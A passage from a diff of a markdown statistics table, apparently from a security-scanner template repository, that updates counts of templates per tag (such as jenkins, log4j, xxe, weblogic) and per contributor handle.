jenkins | 15 | defr0ggy | 4 | | | | | | | -| gitlab | 15 | dolev farhi | 4 | | | | | | | -| dlink | 15 | e_schultze_ | 4 | | | | | | | -| struts | 15 | dadevel | 4 | | | | | | | -| hp | 14 | nodauf | 4 | | | | | | | -| api | 14 | wisnupramoedya | 4 | | | | | | | -| android | 14 | me9187 | 3 | | | | | | | -| xxe | 14 | shine | 3 | | | | | | | -| java | 14 | f1tz | 3 | | | | | | | -| fileupload | 14 | alifathi-h1 | 3 | | | | | | | -| cve2009 | 14 | fyoorer | 3 | | | | | | | -| camera | 13 | andydoering | 3 | | | | | | | -| ruijie | 13 | _generic_human_ | 3 | | | | | | | -| log4j | 12 | h1ei1 | 3 | | | | | | | +| manageengine | 19 | xelkomy | 5 | | | | | | | +| cve2012 | 19 | panch0r3d | 5 | | | | | | | +| zoho | 18 | elsfa7110 | 5 | | | | | | | +| php | 18 | imnightmaree | 5 | | | | | | | +| dns | 18 | praetorian-thendrickson | 5 | | | | | | | +| aws | 17 | yanyun | 5 | | | | | | | +| tomcat | 17 | joanbono | 5 | | | | | | | +| weblogic | 17 | lu4nx | 5 | | | | | | | +| deserialization | 17 | podalirius | 5 | | | | | | | +| k8s | 16 | defr0ggy | 4 | | | | | | | +| ibm | 16 | nodauf | 4 | | | | | | | +| struts | 16 | incogbyte | 4 | | | | | | | +| gitlab | 15 | dadevel | 4 | | | | | | | +| jenkins | 15 | tess | 4 | | | | | | | +| dlink | 15 | wisnupramoedya | 4 | | | | | | | +| cve2011 | 15 | dolev farhi | 4 | | | | | | | +| fileupload | 14 | tanq16 | 4 | | | | | | | +| xxe | 14 | e_schultze_ | 4 | | | | | | | +| cve2009 | 14 | h1ei1 | 4 | | | | | | | +| hp | 14 | me9187 | 3 | | | | | | | +| android | 14 | andydoering | 3 | | | | | | | +| java | 14 | shifacyclewala | 3 | | | | | | | +| api | 14 | sushantkamble | 3 | | | | | | | +| ruijie | 13 | f1tz | 3 | | | | | | | +| firewall | 13 | r3naissance | 3 | | | | | | | +| camera | 13 | jarijaas | 3 | | | | | | | +| cve2013 | 12 | emenalf | 3 | | | | | | | +| lfr | 12 | binaryfigments | 3 | | | | | | | | netsweeper | 12 | z3bd | 3 | | | | | | | -| printer | 12 | github.com/its0x08 | 3 | | | | | | | -| lfr | 12 | lark-lab | 3 | | | | | | | -| cve2013 | 12 | unstabl3 | 3 | | | | | | | -| status | 12 | mavericknerd | 3 | | | | | | | -| rails | 12 | yuzhe-zhang-0 | 3 | | | | | | | -| cnvd2021 | 11 | binaryfigments | 3 | | | | | | | -| nginx | 11 | gitlab red team | 3 | | | | | | | -| firewall | 11 | skeltavik | 3 | | | | | | | -| upload | 11 | jarijaas | 3 | | | | | | | -| magento | 11 | arcc | 3 | | | | | | | -| graphql | 11 | johnjhacking | 3 | | | | | | | -| netgear | 11 | impramodsargar | 3 | | | | | | | -| spring | 10 | r3naissance | 3 | | | | | | | -| fortigate | 10 | dudez | 3 | | | | | | | -| grafana | 10 | davidmckennirey | 3 | | | | | | | -| coldfusion | 10 | supras | 3 | | | | | | | -| dell | 10 | emenalf | 3 | | | | | | | -| jolokia | 10 | whoever | 3 | | | | | | | -| auth | 10 | shifacyclewala | 3 | | | | | | | -| glpi | 10 | yash anand @yashanand155 | 3 | | | | | | | -| backup | 10 | mr-xn | 3 | | | | | | | -| airflow | 10 | sushantkamble | 3 | | | | | | | -| woocommerce | 9 | 0w4ys | 3 | | | | | | | -| fastjson | 9 | thomas_from_offensity | 3 | | | | | | | -| mirai | 9 | cocxanh | 2 | | | | | | | -| ftp | 9 | x1m_martijn | 2 | | | | | | | -| windows | 9 | ambassify | 2 | | | | | | | -| fortinet | 9 | its0x08 | 2 | | | | | | | -| webserver | 9 | parth | 2 | | | | | | | -| zabbix | 9 | danielmofer | 2 | | | | | | | -| drupal | 9 | lotusdll | 2 | | | | | | | -| cve2008 | 9 | bsysop | 2 | | | | | | | -| jndi | 9 | nuk3s3c | 2 | | | | | | | -| github | 9 | huowuzhao | 2 | | | | | | | -| laravel | 9 | kiblyn11 | 2 | | | | | | | -| metadata | 8 | 0xcrypto | 2 | | | | | | | -| amazon | 8 | swissky | 2 | | | | | | | +| rails | 12 | whoever | 3 | | | | | | | +| log4j | 12 | impramodsargar | 3 | | | | | | | +| nginx | 12 | johnjhacking | 3 | | | | | | | +| printer | 12 | _generic_human_ | 3 | | | | | | | +| status | 12 | unstabl3 | 3 | | | | | | | +| upload | 11 | yash anand @yashanand155 | 3 | | | | | | | +| netgear | 11 | supras | 3 | | | | | | | +| graphql | 11 | github.com/its0x08 | 3 | | | | | | | +| cnvd2021 | 11 | mr-xn | 3 | | | | | | | +| magento | 11 | fyoorer | 3 | | | | | | | +| glpi | 10 | thomas_from_offensity | 3 | | | | | | | +| grafana | 10 | 0w4ys | 3 | | | | | | | +| spring | 10 | davidmckennirey | 3 | | | | | | | +| jolokia | 10 | dudez | 3 | | | | | | | +| backup | 10 | gitlab red team | 3 | | | | | | | +| auth | 10 | arcc | 3 | | | | | | | +| dell | 10 | shine | 3 | | | | | | | +| fortigate | 10 | veshraj | 3 | | | | | | | +| airflow | 10 | skeltavik | 3 | | | | | | | +| coldfusion | 10 | mavericknerd | 3 | | | | | | | +| github | 9 | alifathi-h1 | 3 | | | | | | | +| jndi | 9 | lark-lab | 3 | | | | | | | +| mirai | 9 | yuzhe-zhang-0 | 3 | | | | | | | +| wso2 | 9 | cocxanh | 2 | | | | | | | +| fastjson | 9 | bananabr | 2 | | | | | | | +| iis | 9 | paperpen | 2 | | | | | | | +| cve2008 | 9 | its0x08 | 2 | | | | | | | +| laravel | 9 | ajaysenr | 2 | | | | | | | +| woocommerce | 9 | smaranchand | 2 | | | | | | | +| fortinet | 9 | dahse89 | 2 | | | | | | | +| zabbix | 9 | 0xcrypto | 2 | | | | | | | +| ftp | 9 | mohammedsaneem | 2 | | | | | | | +| drupal | 9 | 0xsapra | 2 | | | | | | | +| webserver | 9 | pxmme1337 | 2 | | | | | | | +| windows | 9 | nkxxkn | 2 | | | | | | | +| phpmyadmin | 8 | gal nagli | 2 | | | | | | | +| metadata | 8 | nuk3s3c | 2 | | | | | | | | audit | 8 | z0ne | 2 | | | | | | | -| prometheus | 8 | bananabr | 2 | | | | | | | +| bypass | 8 | convisoappsec | 2 | | | | | | | +| django | 8 | x1m_martijn | 2 | | | | | | | | solr | 8 | r12w4n | 2 | | | | | | | -| phpmyadmin | 8 | mohammedsaneem | 2 | | | | | | | -| azure | 8 | redteambrasil | 2 | | | | | | | -| django | 8 | cckuakilong | 2 | | | | | | | -| scada | 8 | gevakun | 2 | | | | | | | -| blind | 8 | martincodes-de | 2 | | | | | | | -| iis | 8 | bing0o | 2 | | | | | | | -| confluence | 8 | paperpen | 2 | | | | | | | -| bypass | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| citrix | 8 | 0xsapra | 2 | | | | | | | -| vcenter | 8 | gal nagli | 2 | | | | | | | -| wso2 | 8 | rafaelwdornelas | 2 | | | | | | | -| rconfig | 7 | afaq | 2 | | | | | | | -| files | 7 | amsda | 2 | | | | | | | -| sonicwall | 7 | hassan khan yusufzai - | 2 | | | | | | | +| azure | 8 | swissky | 2 | | | | | | | +| zyxel | 8 | udit_thakkur | 2 | | | | | | | +| amazon | 8 | kre80r | 2 | | | | | | | +| confluence | 8 | lotusdll | 2 | | | | | | | +| prometheus | 8 | thardt-praetorian | 2 | | | | | | | +| scada | 8 | splint3r7 | 2 | | | | | | | +| citrix | 8 | ree4pwn | 2 | | | | | | | +| vcenter | 8 | ambassify | 2 | | | | | | | +| blind | 8 | randomrobbie | 2 | | | | | | | +| exchange | 7 | zomsop82 | 2 | | | | | | | +| python | 7 | geekby | 2 | | | | | | | +| kube | 7 | dheerajmadhukar | 2 | | | | | | | +| bucket | 7 | bernardofsr | 2 | | | | | | | +| rconfig | 7 | koti2 | 2 | | | | | | | +| firebase | 7 | 0xrudra | 2 | | | | | | | +| mail | 7 | bsysop | 2 | | | | | | | +| vpn | 7 | hassan khan yusufzai - | 2 | | | | | | | | | | splint3r7 | | | | | | | | -| mail | 7 | pxmme1337 | 2 | | | | | | | -| python | 7 | dahse89 | 2 | | | | | | | -| elasticsearch | 7 | zomsop82 | 2 | | | | | | | -| exchange | 7 | 0xelkomy | 2 | | | | | | | -| vpn | 7 | hackerarpan | 2 | | | | | | | -| ssti | 7 | hetroublemakr | 2 | | | | | | | -| squirrelmail | 7 | nvn1729 | 2 | | | | | | | -| firebase | 7 | udit_thakkur | 2 | | | | | | | -| maps | 7 | geekby | 2 | | | | | | | -| bucket | 7 | ajaysenr | 2 | | | | | | | -| kafka | 7 | y4er | 2 | | | | | | | -| kube | 7 | foulenzer | 2 | | | | | | | -| crlf | 6 | convisoappsec | 2 | | | | | | | -| cicd | 6 | vsh00t | 2 | | | | | | | -| zimbra | 6 | ehsahil | 2 | | | | | | | -| sitecore | 6 | 0xprial | 2 | | | | | | | -| cobbler | 6 | kre80r | 2 | | | | | | | -| lucee | 6 | vavkamil | 2 | | | | | | | -| huawei | 6 | w4cky_ | 2 | | | | | | | -| headless | 6 | moritz nentwig | 2 | | | | | | | -| cnvd2020 | 6 | thardt-praetorian | 2 | | | | | | | -| go | 6 | taielab | 2 | | | | | | | -| fpd | 6 | nkxxkn | 2 | | | | | | | -| druid | 6 | 0xrudra | 2 | | | | | | | -| nodejs | 6 | k11h-de | 2 | | | | | | | -| magmi | 6 | randomrobbie | 2 | | | | | | | -| slack | 6 | smaranchand | 2 | | | | | | | -| jboss | 6 | joeldeleep | 2 | | | | | | | -| jetty | 6 | bp0lr | 2 | | | | | | | -| enum | 6 | sy3omda | 2 | | | | | | | -| bigip | 6 | hahwul | 2 | | | | | | | -| backdoor | 6 | raesene | 2 | | | | | | | -| docker | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| ofbiz | 6 | socketz | 2 | | | | | | | -| firmware | 6 | 0xsmiley | 2 | | | | | | | -| minio | 5 | koti2 | 2 | | | | | | | -| solarwinds | 5 | dheerajmadhukar | 2 | | | | | | | -| rfi | 5 | splint3r7 | 2 | | | | | | | -| rseenet | 5 | fabaff | 2 | | | | | | | -| fatpipe | 5 | luci | 2 | | | | | | | -| ssl | 5 | ree4pwn | 2 | | | | | | | -| symantec | 5 | sbani | 2 | | | | | | | -| setup | 5 | paradessia | 2 | | | | | | | -| leak | 5 | g4l1t0 | 2 | | | | | | | -| kubelet | 5 | bernardofsr | 2 | | | | | | | -| gocd | 5 | manas_harsh | 2 | | | | | | | -| cache | 5 | rschio | 1 | | | | | | | -| git | 5 | b0rn2r00t | 1 | | | | | | | -| node | 5 | blckraven | 1 | | | | | | | -| alibaba | 5 | borna nematzadeh | 1 | | | | | | | -| error | 5 | phyr3wall | 1 | | | | | | | -| symfony | 5 | tim_koopmans | 1 | | | | | | | -| samsung | 5 | retr02332 | 1 | | | | | | | -| keycloak | 5 | whynotke | 1 | | | | | | | -| circarlife | 5 | jiheon-dev | 1 | | | | | | | -| strapi | 5 | revblock | 1 | | | | | | | -| dedecms | 5 | dievus | 1 | | | | | | | -| thinkphp | 5 | bibeksapkota (sar00n) | 1 | | | | | | | -| microweber | 5 | bartu utku sarp | 1 | | | | | | | -| ruby | 5 | brabbit10 | 1 | | | | | | | -| apisix | 5 | akshansh | 1 | | | | | | | -| ecology | 5 | xstp | 1 | | | | | | | -| storage | 5 | kurohost | 1 | | | | | | | -| opensis | 5 | juicypotato1 | 1 | | | | | | | -| moodle | 5 | tirtha_mandal | 1 | | | | | | | -| icewarp | 5 | chron0x | 1 | | | | | | | -| metinfo | 5 | 0xceba | 1 | | | | | | | -| zhiyuan | 5 | bughuntersurya | 1 | | | | | | | -| artica | 5 | patralos | 1 | | | | | | | -| puppet | 4 | 3th1c_yuk1 | 1 | | | | | | | -| jellyfin | 4 | compr00t | 1 | | | | | | | -| awstats | 4 | luqman | 1 | | | | | | | -| npm | 4 | intx0x80 | 1 | | | | | | | -| microstrategy | 4 | 2rs3c | 1 | | | | | | | -| activemq | 4 | kareemse1im | 1 | | | | | | | -| sonarqube | 4 | wabafet | 1 | | | | | | | -| flink | 4 | zandros0 | 1 | | | | | | | -| plesk | 4 | mrcl0wnlab | 1 | | | | | | | -| gogs | 4 | furkansayim | 1 | | | | | | | -| elastic | 4 | opencirt | 1 | | | | | | | -| cve2007 | 4 | daffianfo | 1 | | | | | | | -| search | 4 | alevsk | 1 | | | | | | | -| hpe | 4 | sec_hawk | 1 | | | | | | | -| cloud | 4 | francescocarlucci | 1 | | | | | | | -| couchdb | 4 | 0xteles | 1 | | | | | | | -| springcloud | 4 | flag007 | 1 | | | | | | | -| kibana | 4 | berkdusunur | 1 | | | | | | | -| ssh | 4 | th3.d1p4k | 1 | | | | | | | -| smtp | 4 | 0xtavian | 1 | | | | | | | -| resin | 4 | aaronchen0 | 1 | | | | | | | -| stripe | 4 | evolutionsec | 1 | | | | | | | -| hongdian | 4 | hexcat | 1 | | | | | | | -| voip | 4 | jbaines-r7 | 1 | | | | | | | -| adminer | 4 | veshraj | 1 | | | | | | | -| artifactory | 4 | anon-artist | 1 | | | | | | | -| cockpit | 4 | kailashbohara | 1 | | | | | | | -| asp | 4 | f1she3 | 1 | | | | | | | -| prestashop | 4 | nielsing | 1 | | | | | | | -| caucho | 4 | zsusac | 1 | | | | | | | -| nexus | 4 | sicksec | 1 | | | | | | | -| photo | 4 | elouhi | 1 | | | | | | | -| cnvd2019 | 4 | hanlaomo | 1 | | | | | | | -| paypal | 4 | evan rubinstien | 1 | | | | | | | -| hikvision | 4 | nerrorsec | 1 | | | | | | | -| kevinlab | 4 | 0xh7ml | 1 | | | | | | | -| oa | 4 | higor melgaço (eremit4) | 1 | | | | | | | -| hoteldruid | 4 | igibanez | 1 | | | | | | | -| mongodb | 4 | duty_1g | 1 | | | | | | | -| ognl | 4 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| websphere | 4 | rubina119 | 1 | | | | | | | -| db | 4 | majidmc2 | 1 | | | | | | | -| xmlrpc | 4 | yuansec | 1 | | | | | | | -| buffalo | 4 | elder tao | 1 | | | | | | | -| beyondtrust | 4 | jeya.seelan | 1 | | | | | | | -| tikiwiki | 4 | exid | 1 | | | | | | | -| panos | 4 | ofjaaah | 1 | | | | | | | -| mailchimp | 4 | jrolf | 1 | | | | | | | -| zyxel | 4 | pudsec | 1 | | | | | | | -| wcs | 4 | un-fmunozs | 1 | | | | | | | -| thinkcmf | 4 | makyotox | 1 | | | | | | | -| jetbrains | 4 | d0rkerdevil | 1 | | | | | | | -| terramaster | 4 | mesaglio | 1 | | | | | | | -| aspose | 4 | _c0wb0y_ | 1 | | | | | | | -| cacti | 4 | manasmbellani | 1 | | | | | | | -| database | 3 | momen eldawakhly | 1 | | | | | | | -| movable | 3 | aceseven (digisec360) | 1 | | | | | | | -| sendgrid | 3 | arall | 1 | | | | | | | -| mongo | 3 | amnotacat | 1 | | | | | | | -| javascript | 3 | kba@sogeti_esec | 1 | | | | | | | -| jfrog | 3 | daviey | 1 | | | | | | | -| dreambox | 3 | kaizensecurity | 1 | | | | | | | -| kentico | 3 | push4d | 1 | | | | | | | -| jeesns | 3 | adrianmf | 1 | | | | | | | -| httpd | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| thinfinity | 3 | apt-mirror | 1 | | | | | | | -| log | 3 | sherlocksecurity | 1 | | | | | | | -| cisa | 3 | petruknisme | 1 | | | | | | | -| nosqli | 3 | dhiyaneshdki | 1 | | | | | | | -| fanruan | 3 | 0xceeb | 1 | | | | | | | -| sugarcrm | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| netlify | 3 | sickwell | 1 | | | | | | | -| jamf | 3 | x6263 | 1 | | | | | | | -| linkerd | 3 | prettyboyaaditya | 1 | | | | | | | -| trendnet | 3 | droberson | 1 | | | | | | | -| epson | 3 | v0idc0de | 1 | | | | | | | -| openssh | 3 | philippdelteil | 1 | | | | | | | -| phppgadmin | 3 | ok_bye_now | 1 | | | | | | | -| actuator | 3 | knassar702 | 1 | | | | | | | -| ampps | 3 | alperenkesk | 1 | | | | | | | -| redis | 3 | florianmaak | 1 | | | | | | | -| hashicorp | 3 | coldfish | 1 | | | | | | | -| square | 3 | osamahamad | 1 | | | | | | | -| axis2 | 3 | omarkurt | 1 | | | | | | | -| 3cx | 3 | fopina | 1 | | | | | | | -| heroku | 3 | ggranjus | 1 | | | | | | | -| vbulletin | 3 | wlayzz | 1 | | | | | | | -| oauth | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| nuuo | 3 | narluin | 1 | | | | | | | -| vrealize | 3 | infosecsanyam | 1 | | | | | | | -| centos | 3 | exceed | 1 | | | | | | | -| prtg | 3 | thebinitghimire | 1 | | | | | | | -| sharepoint | 3 | orpheus | 1 | | | | | | | -| fuelcms | 3 | schniggie | 1 | | | | | | | -| subrion | 3 | skylark-lab | 1 | | | | | | | -| synology | 3 | p-l- | 1 | | | | | | | -| mcafee | 3 | gboddin | 1 | | | | | | | -| empirecms | 3 | streetofhackerr007 | 1 | | | | | | | -| voipmonitor | 3 | brenocss | 1 | | | | | | | -| nacos | 3 | notsoevilweasel | 1 | | | | | | | -| dos | 3 | b4uh0lz | 1 | | | | | | | -| seeyon | 3 | mhdsamx | 1 | | | | | | | -| elfinder | 3 | rodnt | 1 | | | | | | | -| bitrix | 3 | udyz | 1 | | | | | | | -| ems | 3 | bad5ect0r | 1 | | | | | | | -| kingsoft | 3 | ipanda | 1 | | | | | | | -| splunk | 3 | s1r1u5_ | 1 | | | | | | | -| panabit | 3 | thevillagehacker | 1 | | | | | | | -| axis | 3 | ooooooo_q | 1 | | | | | | | -| dolibarr | 3 | cookiehanhoan | 1 | | | | | | | -| selea | 3 | fq_hsu | 1 | | | | | | | -| geowebserver | 3 | jeya seelan | 1 | | | | | | | -| fortios | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| pentaho | 3 | lark lab | 1 | | | | | | | -| linkedin | 3 | c3l3si4n | 1 | | | | | | | -| bruteforce | 3 | _harleo | 1 | | | | | | | -| sql | 3 | oscarintherocks | 1 | | | | | | | -| axigen | 3 | micha3lb3n | 1 | | | | | | | -| aptus | 3 | streetofhackerr007 (rohit | 1 | | | | | | | +| maps | 7 | vsh00t | 2 | | | | | | | +| elasticsearch | 7 | luci | 2 | | | | | | | +| ssti | 7 | paradessia | 2 | | | | | | | +| sonicwall | 7 | 0xsmiley | 2 | | | | | | | +| files | 7 | k11h-de | 2 | | | | | | | +| squirrelmail | 7 | kiblyn11 | 2 | | | | | | | +| kafka | 7 | moritz nentwig | 2 | | | | | | | +| cicd | 6 | afaq | 2 | | | | | | | +| cnvd2020 | 6 | cckuakilong | 2 | | | | | | | +| jetty | 6 | sy3omda | 2 | | | | | | | +| go | 6 | danielmofer | 2 | | | | | | | +| cobbler | 6 | sbani | 2 | | | | | | | +| zimbra | 6 | g4l1t0 | 2 | | | | | | | +| docker | 6 | hetroublemakr | 2 | | | | | | | +| jboss | 6 | gevakun | 2 | | | | | | | +| huawei | 6 | joeldeleep | 2 | | | | | | | +| enum | 6 | martincodes-de | 2 | | | | | | | +| ecology | 6 | socketz | 2 | | | | | | | +| druid | 6 | amsda | 2 | | | | | | | +| dedecms | 6 | 0xprial | 2 | | | | | | | +| ofbiz | 6 | vavkamil | 2 | | | | | | | +| bigip | 6 | y4er | 2 | | | | | | | +| nodejs | 6 | raesene | 2 | | | | | | | +| sitecore | 6 | parth | 2 | | | | | | | +| backdoor | 6 | 0xelkomy | 2 | | | | | | | +| fpd | 6 | w4cky_ | 2 | | | | | | | +| crlf | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| slack | 6 | ehsahil | 2 | | | | | | | +| lucee | 6 | redteambrasil | 2 | | | | | | | +| magmi | 6 | huowuzhao | 2 | | | | | | | +| firmware | 6 | bing0o | 2 | | | | | | | +| headless | 6 | fabaff | 2 | | | | | | | +| samsung | 5 | taielab | 2 | | | | | | | +| artica | 5 | foulenzer | 2 | | | | | | | +| opensis | 5 | hackerarpan | 2 | | | | | | | +| fatpipe | 5 | manas_harsh | 2 | | | | | | | +| thinkphp | 5 | bp0lr | 2 | | | | | | | +| gocd | 5 | hahwul | 2 | | | | | | | +| minio | 5 | nvn1729 | 2 | | | | | | | +| microweber | 5 | rafaelwdornelas | 2 | | | | | | | +| node | 5 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| symantec | 5 | zinminphy0 | 1 | | | | | | | +| ssl | 5 | d0rkerdevil | 1 | | | | | | | +| solarwinds | 5 | jeya.seelan | 1 | | | | | | | +| rfi | 5 | ldionmarcil | 1 | | | | | | | +| zhiyuan | 5 | x6263 | 1 | | | | | | | +| alibaba | 5 | kaizensecurity | 1 | | | | | | | +| git | 5 | 0ri2n | 1 | | | | | | | +| rseenet | 5 | sherlocksecurity | 1 | | | | | | | +| symfony | 5 | toufik-airane | 1 | | | | | | | +| keycloak | 5 | kiks7 | 1 | | | | | | | +| circarlife | 5 | revblock | 1 | | | | | | | +| strapi | 5 | qlkwej | 1 | | | | | | | +| storage | 5 | zhenwarx | 1 | | | | | | | +| error | 5 | dawid-czarnecki | 1 | | | | | | | +| leak | 5 | luqman | 1 | | | | | | | +| apisix | 5 | flag007 | 1 | | | | | | | +| ruby | 5 | anon-artist | 1 | | | | | | | +| icewarp | 5 | pratik khalane | 1 | | | | | | | +| kubelet | 5 | 0xrod | 1 | | | | | | | +| metinfo | 5 | rubina119 | 1 | | | | | | | +| moodle | 5 | clarkvoss | 1 | | | | | | | +| cache | 5 | makyotox | 1 | | | | | | | +| setup | 5 | borna nematzadeh | 1 | | | | | | | +| panos | 4 | berkdusunur | 1 | | | | | | | +| resin | 4 | soyelmago | 1 | | | | | | | +| oa | 4 | 0xtavian | 1 | | | | | | | +| adminer | 4 | alex | 1 | | | | | | | +| springcloud | 4 | _c0wb0y_ | 1 | | | | | | | +| hongdian | 4 | p-l- | 1 | | | | | | | +| sophos | 4 | kailashbohara | 1 | | | | | | | +| hoteldruid | 4 | orpheus | 1 | | | | | | | +| mongodb | 4 | yavolo | 1 | | | | | | | +| voip | 4 | bad5ect0r | 1 | | | | | | | +| awstats | 4 | bughuntersurya | 1 | | | | | | | +| thinkcmf | 4 | s1r1u5_ | 1 | | | | | | | +| websphere | 4 | florianmaak | 1 | | | | | | | +| db | 4 | yashanand155 | 1 | | | | | | | +| ognl | 4 | wabafet | 1 | | | | | | | +| artifactory | 4 | andirrahmani1 | 1 | | | | | | | +| kibana | 4 | thevillagehacker | 1 | | | | | | | +| prestashop | 4 | ilovebinbash | 1 | | | | | | | +| mailchimp | 4 | fmunozs | 1 | | | | | | | +| jellyfin | 4 | akash.c | 1 | | | | | | | +| flink | 4 | phyr3wall | 1 | | | | | | | +| jetbrains | 4 | ooooooo_q | 1 | | | | | | | +| elastic | 4 | 0xd0ff9 | 1 | | | | | | | +| buffalo | 4 | kba@sogeti_esec | 1 | | | | | | | +| terramaster | 4 | skylark-lab | 1 | | | | | | | +| beyondtrust | 4 | prajiteshsingh | 1 | | | | | | | +| couchdb | 4 | ahmetpergamum | 1 | | | | | | | +| wcs | 4 | sicksec | 1 | | | | | | | +| puppet | 4 | bibeksapkota (sar00n) | 1 | | | | | | | +| search | 4 | furkansayim | 1 | | | | | | | +| cloud | 4 | nerrorsec | 1 | | | | | | | +| microstrategy | 4 | b0rn2r00t | 1 | | | | | | | +| npm | 4 | elder tao | 1 | | | | | | | +| caucho | 4 | ph33r | 1 | | | | | | | +| cacti | 4 | ok_bye_now | 1 | | | | | | | +| activemq | 4 | manasmbellani | 1 | | | | | | | +| paypal | 4 | udyz | 1 | | | | | | | +| smtp | 4 | retr0 | 1 | | | | | | | +| photo | 4 | majidmc2 | 1 | | | | | | | +| cve2007 | 4 | philippdelteil | 1 | | | | | | | +| plesk | 4 | akshansh | 1 | | | | | | | +| asp | 4 | lethargynavigator | 1 | | | | | | | +| tikiwiki | 4 | husain | 1 | | | | | | | +| kevinlab | 4 | amnotacat | 1 | | | | | | | +| ssh | 4 | remonsec | 1 | | | | | | | +| gogs | 4 | mesaglio | 1 | | | | | | | +| hikvision | 4 | absshax | 1 | | | | | | | +| aspose | 4 | retr02332 | 1 | | | | | | | +| cockpit | 4 | furkansenan | 1 | | | | | | | +| sonarqube | 4 | izn0u | 1 | | | | | | | +| nexus | 4 | omarkurt | 1 | | | | | | | +| hpe | 4 | apt-mirror | 1 | | | | | | | +| stripe | 4 | remi gascou (podalirius) | 1 | | | | | | | +| cnvd2019 | 4 | compr00t | 1 | | | | | | | +| xmlrpc | 4 | 3th1c_yuk1 | 1 | | | | | | | +| umbraco | 3 | th3.d1p4k | 1 | | | | | | | +| phpinfo | 3 | push4d | 1 | | | | | | | +| sharepoint | 3 | 0xceeb | 1 | | | | | | | +| openemr | 3 | streetofhackerr007 (rohit | 1 | | | | | | | | | | soni) | | | | | | | | -| webadmin | 3 | j33n1k4 | 1 | | | | | | | -| globalprotect | 3 | miroslavsotak | 1 | | | | | | | -| httpbin | 3 | zhenwarx | 1 | | | | | | | -| consul | 3 | justmumu | 1 | | | | | | | -| ebs | 3 | exploitation | 1 | | | | | | | -| phpinfo | 3 | co0nan | 1 | | | | | | | -| samba | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| facebook | 3 | manuelbua | 1 | | | | | | | -| openam | 3 | ilovebinbash | 1 | | | | | | | -| telerik | 3 | bernardo rodrigues | 1 | | | | | | | +| centos | 3 | ohlinge | 1 | | | | | | | +| zeroshell | 3 | tirtha | 1 | | | | | | | +| ampps | 3 | iampritam | 1 | | | | | | | +| netlify | 3 | alevsk | 1 | | | | | | | +| linksys | 3 | daffianfo | 1 | | | | | | | +| targa | 3 | mrcl0wnlab | 1 | | | | | | | +| kingsoft | 3 | jiheon-dev | 1 | | | | | | | +| actuator | 3 | aresx | 1 | | | | | | | +| bruteforce | 3 | hanlaomo | 1 | | | | | | | +| telerik | 3 | wlayzz | 1 | | | | | | | +| linkerd | 3 | vzamanillo | 1 | | | | | | | +| webadmin | 3 | becivells | 1 | | | | | | | +| phppgadmin | 3 | coldfish | 1 | | | | | | | +| nacos | 3 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| concrete | 3 | alex | 1 | | | | | | | -| sophos | 3 | andysvints | 1 | | | | | | | -| rlm | 3 | absshax | 1 | | | | | | | -| workspaceone | 3 | furkansenan | 1 | | | | | | | -| zeroshell | 3 | pratik khalane | 1 | | | | | | | -| glassfish | 3 | jteles | 1 | | | | | | | -| odoo | 3 | affix | 1 | | | | | | | -| trixbox | 3 | ahmetpergamum | 1 | | | | | | | -| horizon | 3 | retr0 | 1 | | | | | | | -| messaging | 3 | remi gascou (podalirius) | 1 | | | | | | | -| seagate | 3 | thezakman | 1 | | | | | | | -| postmessage | 3 | myztique | 1 | | | | | | | -| circleci | 3 | luskabol | 1 | | | | | | | -| lansweeper | 3 | ahmed abou-ela | 1 | | | | | | | -| lotus | 3 | ahmed sherif | 1 | | | | | | | -| targa | 3 | ringo | 1 | | | | | | | -| wordfence | 3 | xshuden | 1 | | | | | | | -| grav | 3 | 0xd0ff9 | 1 | | | | | | | -| smb | 3 | mah3sec_ | 1 | | | | | | | -| openemr | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| graph | 3 | ldionmarcil | 1 | | | | | | | -| openbmcs | 3 | official_blackhat13 | 1 | | | | | | | -| exposures | 3 | dawid-czarnecki | 1 | | | | | | | -| linksys | 3 | kabirsuda | 1 | | | | | | | -| accela | 2 | _darrenmartyn | 1 | | | | | | | -| code42 | 2 | fmunozs | 1 | | | | | | | -| rackstation | 2 | husain | 1 | | | | | | | -| intercom | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| rocketchat | 2 | tea | 1 | | | | | | | -| ambari | 2 | nytr0gen | 1 | | | | | | | -| neos | 2 | deena | 1 | | | | | | | -| akamai | 2 | xeldax | 1 | | | | | | | -| phpstorm | 2 | undefl0w | 1 | | | | | | | -| orchid | 2 | 0xrod | 1 | | | | | | | -| cloudflare | 2 | arr0way | 1 | | | | | | | -| digitalrebar | 2 | akash.c | 1 | | | | | | | -| gitbook | 2 | geraldino2 | 1 | | | | | | | -| rancher | 2 | hakluke | 1 | | | | | | | -| rackn | 2 | yavolo | 1 | | | | | | | -| webcam | 2 | mass0ma | 1 | | | | | | | -| watchguard | 2 | 0h1in9e | 1 | | | | | | | -| jitsi | 2 | noamrathaus | 1 | | | | | | | -| cloudinary | 2 | notnotnotveg | 1 | | | | | | | -| smartstore | 2 | b0yd | 1 | | | | | | | -| bomgar | 2 | pdp | 1 | | | | | | | -| avaya | 2 | mubassirpatel | 1 | | | | | | | -| gespage | 2 | thesubtlety | 1 | | | | | | | -| gradle | 2 | sshell | 1 | | | | | | | -| redash | 2 | harshinsecurity | 1 | | | | | | | -| wuzhicms | 2 | clarkvoss | 1 | | | | | | | -| jsf | 2 | shreyapohekar | 1 | | | | | | | -| twitter | 2 | remonsec | 1 | | | | | | | -| gitea | 2 | qlkwej | 1 | | | | | | | -| livezilla | 2 | shifacyclewla | 1 | | | | | | | -| ixcache | 2 | izn0u | 1 | | | | | | | -| arcgis | 2 | charanrayudu | 1 | | | | | | | -| servicenow | 2 | luqmaan hadia | 1 | | | | | | | -| auerswald | 2 | noobexploiter | 1 | | | | | | | -| thruk | 2 | soyelmago | 1 | | | | | | | -| waf | 2 | iampritam | 1 | | | | | | | -| jmx | 2 | aresx | 1 | | | | | | | -| bmc | 2 | ratnadip 